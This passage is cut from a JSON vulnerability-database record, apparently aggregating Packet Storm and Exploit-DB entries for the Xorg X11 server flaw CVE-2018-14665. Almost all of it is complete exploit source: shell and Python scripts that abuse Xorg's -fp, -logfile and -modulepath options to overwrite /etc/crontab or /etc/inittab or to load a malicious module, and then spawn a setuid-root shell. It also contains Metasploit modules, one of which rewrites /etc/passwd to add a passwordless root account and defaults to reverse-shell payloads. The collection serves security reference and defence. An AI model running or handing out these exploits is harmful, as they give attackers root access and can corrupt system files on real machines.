<raptor@0xdeadbeef.info>\" \n \n# prepare the payload \ncat << EOF > /tmp/xorgasm \ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c \ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid \nchmod 4777 /usr/local/bin/pwned \nEOF \nchmod +x /tmp/xorgasm \n \n# trigger the bug \ncd /etc \nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 & \nsleep 5 \npkill Xorg \n \n# run the setuid shell \necho \necho \"Be patient for a couple of minutes...\" \necho \nsleep 120 \necho \necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\" \nls -l /etc/crontab* \nls -l /usr/local/bin/pwned \n/usr/local/bin/pwned \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150042/x111203-escalate.txt"}, {"lastseen": "2018-11-14T02:15:02", "description": "", "published": "2018-11-13T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "PACKETSTORM:150295", "href": "https://packetstormsecurity.com/files/150295/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7) \n# Date: 2018-11-07 \n# Exploit Author: @bolonobolo \n# Vendor Homepage: https://www.x.org/ \n# Version: 1.19.5 \n# Tested on: RHEL 7.3 && 7.5 \n# CVE : CVE-2018-14665 \n# Explanation \n# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user \n# has to be logged in trought console at the moment the PE script launched. \n# In fact during the logged in session of the legitimate non-root user, \n# a file with the name of the non-root user will be created in the /var/run/console folder. \n# With that file present, the same non-root user can launch a Xorg command via SSH. \n# \n# Usage: $ python poc.py \n# $ python poc.py \n# [*] Waiting for bolo to connect to the console \n# [*] OK --> bolo console opened \n# [*] Building root shell wait 2 minutes \n# [*] crontab overwritten \n# \n# ... cut Xorg output ... \n# \n# [*] Xorg killed \n# (II) Server terminated successfully (0). Closing log file. \n# [*] Don't forget to cleanup /etc/crontab and /tmp dir \n# sh-4.2# id && whoami \n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo) \n# root \n# sh-4.2# \n \n \n#!/usr/bin/python \nimport os \nimport getpass \nimport subprocess \n \nuserList = [] \npath=\"/var/run/console/\" \n \ndef getWhoami(): \nreturn getpass.getuser() \n \ndef getConsole(path): \np = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE) \n(console, err) = p.communicate() \nconsoleList = str.splitlines(console) \nreturn consoleList \n \ndef payload(): \nf = open(\"/tmp/payload\", \"w\") \npayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \n\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\" \n\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\" \n\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\" \n\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\" \n\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\" \n\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\" \n\"chmod 4777 /usr/local/bin/shell\\n\") \nf.write(payload) \n \ndef executePayload(): \nos.system(\"chmod +x /tmp/payload\") \nos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\") \nprint \"[*] crontab overwritten\" \nos.system(\"sleep 5\") \nos.system(\"pkill Xorg\") \nprint \"[*] Xorg killed\" \nos.system(\"sleep 120\") \nreturn \n \ndef main(): \nwhoami = getWhoami() \nprint \"[*] Waiting for \" + whoami + \" to connect to the console\" \ni = 0 \nwhile (i == 0): \nconsoleList = getConsole(path) \nfor user in consoleList: \nif user == whoami : \nprint \"[*] OK --> \" + user + \" console opened\" \ni = 1 \nprint \"[*] Building root shell wait 2 minutes\" \npayload() \nexecutePayload() \nprint \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\" \nos.system(\"/usr/local/bin/shell\") \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150295/xorgx11server-escalate.txt"}, {"lastseen": "2018-11-26T10:22:16", "description": "", "published": "2018-11-25T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server SUID Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-25T00:00:00", "id": "PACKETSTORM:150450", "href": "https://packetstormsecurity.com/files/150450/Xorg-X11-Server-SUID-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::Kernel \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server SUID privilege escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges with SUID Xorg X11 server \nversions 1.19.0 < 1.20.3. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). \nCentOS default install will require console auth for the users session. \nCron launches the payload so if Selinux is enforcing exploitation \nmay still be possible, but the module will bail. \nXorg must have SUID permissions and may not start if running. \n \nOn exploitation a crontab.old backup file will be created by Xorg. \nThis module will remove the .old file and restore crontab after \nsuccessful exploitation. Failed exploitation may result in a corrupted \ncrontab. On successful exploitation artifacts will be created consistant \nwith starting Xorg and running a cron. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Narendra Shinde', # Discovery and exploit \n'Raptor - 0xdea', # Modified exploit for cron \n'Aaron Ringo', # Metasploit module \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module \n], \n'DisclosureDate' => 'Oct 25 2018', \n'References' => \n[ \n[ 'CVE', '2018-14665' ], \n[ 'BID', '105741' ], \n[ 'EDB', '45697' ], \n[ 'EDB', '45742' ], \n[ 'EDB', '45832' ], \n[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ], \n[ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] \n], \n'Platform' => %w[openbsd linux], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'SessionTypes' => %w[shell meterpreter], \n'Targets' => \n[ \n['OpenBSD', { \n'Platform' => 'unix', \n'Arch' => [ ARCH_CMD ] } ], \n['Linux x64', { \n'Platform' => 'linux', \n'Arch' => [ ARCH_X64 ] } ], \n['Linux x86', { \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ] } ] \n], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'cmd/unix/reverse_openssl', \n'WfsDelay' => 120 \n}, \n'DefaultTarget' => 0)) \n \nregister_advanced_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \nOptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), \nOptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) \n] \n) \nend \n \n \ndef check \n \n# linux checks \nuname = cmd_exec \"uname\" \nif uname =~ /linux/i \nvprint_status \"Running additional check for Linux\" \nif datastore['ConsoleLock'] \nuser = cmd_exec \"id -un\" \nunless exist? \"/var/run/console/#{user}\" \nvprint_error \"No console lock for #{user}\" \nreturn CheckCode::Safe \nend \nvprint_good \"Console lock for #{user}\" \nend \nif selinux_installed? \nif selinux_enforcing? \nvprint_error 'Selinux is enforcing' \nreturn CheckCode::Safe \nend \nend \nvprint_good \"Selinux is not an issue\" \nend \n \n# suid program check \nxorg_path = cmd_exec \"command -v Xorg\" \nunless xorg_path.include?(\"Xorg\") \nvprint_error \"Could not find Xorg executable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg path found at #{xorg_path}\" \nunless setuid? xorg_path \nvprint_error \"Xorg binary #{xorg_path} is not SUID\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg binary #{xorg_path} is SUID\" \n \n# version check \nx_version = cmd_exec \"Xorg -version\" \nif x_version.include?(\"Release Date\") \nv = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first) \nunless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) \nvprint_error \"Xorg version #{v} not supported\" \nreturn CheckCode::Safe \nend \nelsif x_version.include?(\"Fatal server error\") \nvprint_error \"User probably does not have console auth\" \nvprint_error \"Below is Xorg -version output\" \nvprint_error x_version \nreturn CheckCode::Safe \nelse \nvprint_warning \"Could not parse Xorg -version output\" \nreturn CheckCode::Appears \nend \nvprint_good \"Xorg version #{v} is vulnerable\" \n \n# process check for /X \nproc_list = cmd_exec \"ps ax\" \nif proc_list.include?('/X ') \nvprint_warning('Xorg in process list') \nreturn CheckCode::Appears \nend \nvprint_good('Xorg does not appear running') \nreturn CheckCode::Vulnerable \nend \n \ndef on_new_session(session) \nif session.type.to_s.eql? 'meterpreter' \nsession.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' \nsession.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\" \nelse \nsession.shell_command(@clean_up) \nend \nprint_good \"Returning session after cleaning\" \nensure \nsuper \nend \n \ndef exploit \n \ncheck_status = check \nif check_status == CheckCode::Appears \nprint_warning 'Could not get version or Xorg process possibly running, may fail' \nelsif check_status == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'This session already has root privileges' \nend \n \nunless writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \nprint_good 'Passed all initial checks for exploit' \n \npscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\" \n@clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\" \nxdisplay = datastore['Xdisplay'] \n \n# Uploading file crontab will run \nprint_status 'Uploading your payload, this could take a while' \nif payload.arch.first == 'cmd' \nwrite_file(pscript, payload.encoded) \nelse \nwrite_file(pscript, generate_payload_exe) \nend \nregister_file_for_cleanup pscript \nchmod pscript \n \n# Exploit steps on crontab so backing it up \ncmd_exec \"cat /etc/crontab > #{pscript}.b\" \n# Actual exploit with cron overwrite \nprint_status 'Trying /etc/crontab overwrite' \ncmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\" \nRex.sleep 5 \ncmd_exec \"pkill Xorg\" \nRex.sleep 1 \ncron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\" \nunless cron_check.include? pscript \nrm_f \"#{pscript}.b\" \nprint_error 'Deleting crontab backup' \nfail_with Failure::NotVulnerable, '/etc/crontab not modified' \nend \nprint_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...' \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150450/xorg_x11_suid_server.rb.txt"}, {"lastseen": "2019-11-14T02:21:27", "description": "", "published": "2019-11-12T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-12T00:00:00", "id": "PACKETSTORM:155276", "href": "https://packetstormsecurity.com/files/155276/Xorg-X11-Server-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server Local Privilege Escalation', \n'Description' => %q( \nWARNING: Successful execution of this module results in /etc/passwd being overwritten. \n \nThis module is a port of the OpenBSD X11 Xorg exploit to run on AIX. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. \nDue to permission restrictions of the crontab in AIX, this module does not use cron, \nand instead overwrites /etc/passwd in order to create a new user with root privileges. \nAll currently logged in users need to be included when /etc/passwd is overwritten, \nelse AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. \nThe Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, \nand is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when \noverwriting /etc/passwd. \n), \n'Author' => \n[ \n'Narendra Shinde', # Discovery and original FreeBSD exploit \n'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => 'Oct 25 2018', \n'Notes' => \n{ \n'SideEffects' => [ CONFIG_CHANGES ] \n}, \n'References' => \n[ \n['CVE', '2018-14665'], \n['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'], \n['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'], \n['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'], \n['EDB', '45938'] \n], \n'Platform' => ['unix'], \n'Arch' => [ARCH_CMD], \n'SessionTypes' => ['shell'], \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'perl' \n} \n}, \n'DefaultOptions' => { \n'Payload' => 'cmd/unix/reverse_perl' \n}, \n'Targets' => \n[ \n['IBM AIX Version 6.1', {}], \n['IBM AIX Version 7.1', {}], \n['IBM AIX Version 7.2', {}] \n], \n'DefaultTarget' => 1)) \n \nregister_options( \n[ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \n) \nend \n \ndef check \nxorg_path = cmd_exec('command -v Xorg') \nif !xorg_path.include?('Xorg') \nprint_error('Could not find Xorg executable') \nreturn Exploit::CheckCode::Safe \nend \n \nksh93_path = cmd_exec('command -v ksh93') \nif !ksh93_path.include?('ksh') \nprint_error('Could not find Ksh93 executable') \nreturn Exploit::CheckCode::Safe \nend \n \nif !xorg_vulnerable? \nprint_error('Xorg version is not vulnerable') \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Appears \nend \n \ndef exploit \nstatus = check \n \nif status == Exploit::CheckCode::Safe \nfail_with(Failure::NotVulnerable, '') \nend \n \nif !writable?(datastore['WritableDir']) \nfail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\") \nend \n \nxorg_path = cmd_exec('command -v Xorg') \nksh93_path = cmd_exec('command -v ksh93') \n \nxorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir']) \nxorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\" \nupload_and_chmodx(xorg_script_path, xorg_payload) \n \npasswd_backup = \"#{datastore['WritableDir']}/passwd.backup\" \nprint_status(\"Backing up /etc/passwd to #{passwd_backup}\") \ncmd_exec(\"cp /etc/passwd #{passwd_backup}\") \nregister_file_for_cleanup(passwd_backup) \n \nprint_status(\"Executing #{xorg_script_path}\") \ncmd_exec(xorg_script_path) \nprint_status('Checking if we are root') \n \nif root? \nshell_payload = %(#!#{ksh93_path} \n#{payload.encoded} \n) \nshell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\" \nupload_and_chmodx(shell_script_path, shell_payload) \n \nprint_status('Executing shell payload') \ncmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\") \n \nprint_status('Restoring original /etc/passwd') \ncmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\") \nelse \nfail_with(Failure::PayloadFailed, '') \nend \nend \n \ndef generate_xorg_payload(xorg_path, ksh93_path, writabledir) \npasswd_file = read_file('/etc/passwd') \npasswd_array = passwd_file.split(\"\\n\") \n \nprint_status('Retrieving currently logged in users') \nusers = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq') \nusers << \"\\n\" \nusers_array = users.split(\"\\n\") \n \nlogged_in_users = '' \nif !users_array.empty? \nusers_array.each do |user| \nuser << ':' \npasswd_array.each do |line| \nif line.index(user) == 0 \nlogged_in_users << '\\n' \nlogged_in_users << line \nend \nend \nend \nend \n \npasswd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\" \n \nsubdir_count = writabledir.count('/') \nrelative_passwd = '../' * subdir_count + '../../etc/passwd' \n \nreturn %(#!#{ksh93_path} \n#{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1 \n) \nend \n \ndef xorg_vulnerable? \nversion = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'') \nprint_status(\"Xorg version is #{version}\") \nsemantic_version = Gem::Version.new(version) \n \nvulnerable_versions = [ \n['6.1.9.0', '6.1.9.100'], \n['7.1.4.0', '7.1.4.30'], \n['7.1.5.0', '7.1.5.31'], \n['7.2.0.0', '7.2.0.1'], \n['7.2.1.0', '7.2.1.0'], \n['7.2.2.0', '7.2.2.0'], \n['7.2.3.0', '7.2.3.15'] \n] \n \nvulnerable_versions.each do |version_pair| \nif semantic_version >= Gem::Version.new(version_pair[0]) && \nsemantic_version <= Gem::Version.new(version_pair[1]) \nreturn true \nend \nend \n \nreturn false \nend \n \ndef root? \nid_output = cmd_exec('su - wow -c \"id\"') \n \nif id_output.include?('euid=0') || id_output.include?('uid=0') \nprint_good('Got root!') \nreturn true \nend \n \nprint_error('Not root') \nfalse \nend \n \ndef upload_and_chmodx(path, data) \nprint_status(\"Writing to #{path}\") \nrm_f(path) \nwrite_file(path, data) \ncmd_exec(\"chmod 0555 '#{path}'\") \n \nregister_file_for_cleanup(path) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155276/xorg_x11_server.rb.txt"}, {"lastseen": "2018-12-01T18:27:26", "description": "", "published": "2018-12-01T00:00:00", "type": "packetstorm", "title": "xorg-x11-server modulepath Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0745", "CVE-2018-14665"], "modified": "2018-12-01T00:00:00", "id": "PACKETSTORM:150554", "href": "https://packetstormsecurity.com/files/150554/xorg-x11-server-modulepath-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n \n# \n# raptor_xorgy - xorg-x11-server LPE via modulepath switch \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# This exploit variant triggers the bug in the -modulepath command line switch \n# to load a malicious X11 module in order to escalate privileges to root on \n# vulnerable systems. This technique is less invasive than exploiting the \n# -logfile switch, however the gcc compiler must be present in order for it to \n# work out of the box. Alternatively, you must use a pre-compiled malicious .so \n# compatible with the target system and modify the exploit accordingly. \n# \n# It works very reliably on Solaris 11.4 and should work on most vulnerable \n# Linux distributions (though I haven't tested it). For some reason, it fails to \n# obtain uid 0 on OpenBSD... They might have an additional protection in place. \n# \n# Thanks to @alanc and @nushinde for discussing this alternative vector. \n# \n# See also: \n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm \n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm \n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html \n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745 \n# \n# Usage: \n# raptor@stalker:~$ chmod +x raptor_xorgy \n# raptor@stalker:~$ ./raptor_xorgy \n# [...] \n# root@stalker:~# id \n# uid=0(root) gid=0(root) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] \n# Oracle Solaris 11 SPARC [untested] \n# CentOS Linux 7 [untested, it should work] \n# Red Hat Enterprise Linux 7 [untested] \n# Ubuntu Linux 18.10 [untested] \n# Ubuntu Linux 18.04 LTS [untested] \n# Ubuntu Linux 16.04 LTS [untested] \n# Debian GNU/Linux 9 [untested] \n# [...] \n# \n \necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\" \necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\" \necho \n \n# prepare the payload \ncat << EOF > /tmp/pwned.c \n_init() \n{ \nsetuid(0); \nsetgid(0); \nsystem(\"/bin/bash\"); \n} \nEOF \n# libglx.so should be a good target, refer to Xorg logs for other candidates \ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so \nif [ $? -ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi \n \n# trigger the bug \necho \"Got root?\" \nXorg -modulepath \",/tmp\" :1 \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150554/xorgx11modulepath-escalate.txt"}], "exploitdb": [{"lastseen": "2019-01-14T16:58:03", "description": "", "published": "2019-01-14T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "EDB-ID:46142", "href": "https://www.exploit-db.com/exploits/46142", "sourceData": "#!/bin/sh\r\n\r\n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\r\n# Date: 2018-11-25\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: Oracle Solaris 11.4\r\n# CVE : CVE-2018-14665\r\n\r\n#\r\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# \"In video games, this is what they call respawning\" -- Nick Sax\r\n#\r\n# This exploit targets /etc/inittab in order to escalate privileges to root\r\n# on Solaris 11 (no need to be connected to a physical console). Messing with \r\n# inittab is considerably dangerous and you may trash your system, however the\r\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \r\n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n#\r\n# Usage:\r\n# raptor@stalker:~$ chmod +x raptor_solgasm\r\n# raptor@stalker:~$ ./raptor_solgasm\r\n# [...]\r\n# Now please be patient for a few minutes...\r\n# [...]\r\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\r\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\r\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\r\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\r\n# root@stalker:/etc# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n#\r\n\r\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/solgasm\r\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /tmp/pwned\r\nchmod 4777 /tmp/pwned\r\nEOF\r\nchmod +x /tmp/solgasm\r\n\r\n# trigger the bug\r\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\r\ncd /etc\r\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Now please be patient for a few minutes...\"\r\necho\r\nuntil [ -u /tmp/pwned ]; do sleep 1; done\r\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\r\nls -l /etc/inittab*\r\nls -l /tmp/pwned\r\nsleep 1\r\n/tmp/pwned", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46142"}, {"lastseen": "2018-11-30T12:30:58", "description": "", "published": "2018-11-26T00:00:00", "type": "exploitdb", "title": "Xorg X11 Server - SUID privilege escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-26T00:00:00", "id": "EDB-ID:45908", "href": "https://www.exploit-db.com/exploits/45908", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID privilege escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Cron launches the payload so if Selinux is enforcing exploitation\r\n may still be possible, but the module will bail.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On exploitation a crontab.old backup file will be created by Xorg.\r\n This module will remove the .old file and restore crontab after\r\n successful exploitation. Failed exploitation may result in a corrupted\r\n crontab. On successful exploitation artifacts will be created consistant\r\n with starting Xorg and running a cron.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Raptor - 0xdea', # Modified exploit for cron\r\n 'Aaron Ringo', # Metasploit module\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\r\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\r\n ],\r\n 'Platform' => %w[openbsd linux],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['OpenBSD', {\r\n 'Platform' => 'unix',\r\n 'Arch' => [ ARCH_CMD ] } ],\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X64 ] } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X86 ] } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\r\n 'WfsDelay' => 120\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist? \"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n if selinux_installed?\r\n if selinux_enforcing?\r\n vprint_error 'Selinux is enforcing'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good \"Selinux is not an 